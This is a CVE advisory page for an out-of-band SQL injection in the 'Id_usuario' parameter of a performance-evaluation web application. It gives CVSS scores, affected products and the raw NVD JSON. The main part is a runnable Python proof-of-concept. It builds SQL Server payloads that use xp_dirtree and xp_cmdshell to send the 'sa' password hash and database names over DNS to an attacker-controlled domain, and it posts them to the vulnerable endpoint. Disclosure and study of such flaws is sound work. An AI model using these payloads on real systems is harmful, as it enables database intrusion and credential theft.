Security Vulnerability Report
CVE-2026-1473 CVSS 7.5 HIGH

CVE-2026-1473

Published: 2026-01-27 17:16:11
Last Modified: 2026-02-10 20:20:56

Description

An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in '/evaluacion_competencias_evalua.aspx' could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:* - VULNERABLE
Performance Evaluation (EDD) application - all unpatched versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-1473 - Out-of-Band SQL Injection PoC
Target: Performance Evaluation (EDD) by Gabinete Técnico de Programación
Endpoint: /evaluacion_competencias_evalua.aspx
Vulnerable Parameter: Id_usuario
"""
import requests
import base64
import argparse


def build_oob_payload(target_domain):
    """Build OOB SQLi payload for DNS exfiltration on SQL Server"""
    # Payload to extract database user via DNS request
    # Using xp_dirtree to trigger DNS lookup
    payload = f"'; DECLARE @host VARCHAR(8000); SET @host = (SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa') + '.{target_domain}'; EXEC('master..xp_dirtree ''\\\\' + @host + '\\c$'''); --"
    return payload


def build_dns_exfil_payload(target_domain, query):
    """Build DNS exfiltration payload for SQL Server"""
    # Encode query result and send via DNS
    encoded_query = base64.b64encode(query.encode()).decode()
    # Inner double quotes are escaped so the Python string literal parses
    payload = f"'; DECLARE @data VARCHAR(8000); SELECT @data = (SELECT TOP 1 name FROM sys.databases); EXEC('exec master..xp_cmdshell \"ping ' + @data + '.' + '{target_domain}' + '\"'); --"
    return payload


def exploit_sql_injection(target_url, vulnerable_param, payload, proxy=None):
    """
    Send malicious payload to vulnerable endpoint
    """
    proxies = {'http': proxy, 'https': proxy} if proxy else None

    # Target endpoint
    endpoint = f"{target_url}/evaluacion_competencias_evalua.aspx"

    # POST data with malicious Id_usuario parameter
    data = {
        vulnerable_param: payload,
        '__VIEWSTATE': 'dummy',
        '__EVENTVALIDATION': 'dummy'
    }

    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }

    try:
        response = requests.post(endpoint, data=data, headers=headers,
                                 proxies=proxies, timeout=30, verify=False)
        return response.status_code, response.text[:500]
    except requests.exceptions.RequestException as e:
        return None, str(e)


def main():
    parser = argparse.ArgumentParser(description='CVE-2026-1473 OOB SQLi PoC')
    parser.add_argument('--url', required=True, help='Target base URL')
    parser.add_argument('--attacker-domain', required=True,
                        help='Attacker-controlled domain for DNS exfiltration')
    parser.add_argument('--param', default='Id_usuario',
                        help='Vulnerable parameter name')
    parser.add_argument('--proxy', help='HTTP proxy for debugging')
    args = parser.parse_args()

    print(f"[*] CVE-2026-1473 OOB SQL Injection PoC")
    print(f"[*] Target: {args.url}")
    print(f"[*] Attacker Domain: {args.attacker_domain}")

    # Build payload
    payload = build_oob_payload(args.attacker_domain)
    print(f"[*] Generated Payload: {payload[:100]}...")

    # Send exploit
    print(f"[*] Sending exploit request...")
    status, response = exploit_sql_injection(args.url, args.param, payload, args.proxy)

    if status:
        print(f"[+] Request sent. Status: {status}")
        print(f"[*] Check DNS logs on {args.attacker_domain} for exfiltrated data")
    else:
        print(f"[-] Request failed: {response}")


if __name__ == '__main__':
    main()

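References

https://www.incibe.es/en/incibe-cert/notices/aviso/out-band-sql-injection-quatuor-performance-evaluation (Third Party Advisory)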

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1473", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:10.547", "lastModified": "2026-02-10T20:20:56.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario’ in '/evaluacion_competencias_evalua.aspx', could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information."}, {"lang": "es", "value": "Una vulnerabilidad de inyección SQL fuera de banda (OOB SQLi) ha sido detectada en la aplicación de Evaluación del Desempeño (EDD) desarrollada por Gabinete Técnico de Programación. La explotación de esta vulnerabilidad en el parámetro 'Id_usuario' en '/evaluacion_competencias_evalua.aspx' podría permitir a un atacante extraer información sensible de la base de datos a través de canales externos, sin que la aplicación afectada devuelva los datos directamente, comprometiendo la confidencialidad de la información almacenada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", 
"exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:*", "matchCriteriaId": "66ECBB1A-4822-4186-9C8B-49740C8B52A4"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/out-band-sql-injection-quatuor-performance-evaluation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}